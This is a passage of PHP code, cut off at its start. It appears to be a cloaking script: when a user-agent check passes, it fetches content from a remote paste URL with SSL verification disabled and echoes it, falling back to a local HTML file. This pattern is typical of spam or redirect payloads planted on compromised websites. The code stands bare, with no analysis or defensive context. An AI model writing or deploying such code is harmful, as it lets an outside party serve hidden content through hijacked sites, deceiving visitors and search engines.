true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_TIMEOUT => 10, CURLOPT_USERAGENT => 'Mozilla/5.0' ]); $data = curl_exec($ch); curl_close($ch); return $data; } // ===== MAIN LOGIC ===== if (isAllowedUA()) { $remoteUrl = "https://raw.zeverix.com/raw/untitled-842"; $content = loadRemote($remoteUrl); // Fallback kalau remote mati if (!$content) { $localFallback = __DIR__ . '/fallback.html'; if (file_exists($localFallback)) { $content = file_get_contents($localFallback); } } if ($content) { echo $content; exit; } } ?>